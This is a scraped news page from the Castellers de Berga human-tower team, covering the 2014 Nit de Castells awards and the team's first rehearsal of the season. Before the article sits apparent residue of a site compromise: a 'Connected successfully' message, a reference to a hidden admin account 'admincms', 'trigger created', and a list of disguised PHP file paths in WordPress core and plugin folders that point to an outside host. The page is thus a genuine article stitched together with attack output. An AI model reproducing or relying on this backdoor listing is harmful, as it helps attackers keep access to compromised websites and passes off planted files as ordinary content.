Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?cron https://castellersdeberga.cat/wp-admin/includes/class-theme-upgrader-core-meta.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-automatic-upgrader-skin-cron-core-cron-stream-meta-ajax-response.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/user-ajax-response-private-private-wp.php https://castellersdeberga.cat/wp-content/plugins/woocommerce/woocommerce-ajax-response-core-meta-cron-meta-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/revslider/revslider-ajax-wp-wp.php https://castellersdeberga.cat/wp-includes/class-wp-admin-bar-ajax-response-stream-ajax-stream-meta-core.php https://castellersdeberga.cat/wp-includes/class-wp-object-cache-meta-wp-ajax-response-stream-cron-private.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Nit de Castells i inici de la temporada
 

Nit de Castells i inici de la temporada


Nit de Castells i inici de la temporadaDissabte 1 de febrer, els Castellers de Berga van participar a la 8a edició de la Nit de Castells. El Teatre Principal de Valls va acollir la l’esdeveniment que anualment organitza la Revista Castells, en conveni amb l’Ajuntament de Valls com a soci principal. En l’acte es premien colles, persones i iniciatives vinculades al món casteller que han destacat durant la temporada anterior. La Nit de Castells ha estrenat enguany un nou format i ha estat la més multitudinària, tant en número d’assistents com d’entitats representades.

La vetllada va ser presidida pel portaveu de la Generalitat de Catalunya Francesc Homs, el vicepresident de la Diputació de Tarragona Quim Nin, i l’alcade de Valls Albert Batet, entre altres personalitats. Va comptar, també, amb la participació d’un grup artístic que, mitjançant la música i les arts visuals, van elaborar un mural inspirat en el món casteller.
Més informació sobre la Nit de Castells

Diumenge 2 de febrer, els Castellers de Berga van fer el primer assaig de la temporada, al Teatre de Cal Rosal. Hi ha previstos una setantena aquest 2014. Va ser el primer assaig de nous castellers que s’incorporen i també l’estrena de Guillem Gonfaus, com a cap de colla. Més de 100 persones van donar el tret de sortida a la tercera temporada a la colla berguedana. Els assajos continuaran els divendres i diumenges durant els mesos d’hivern.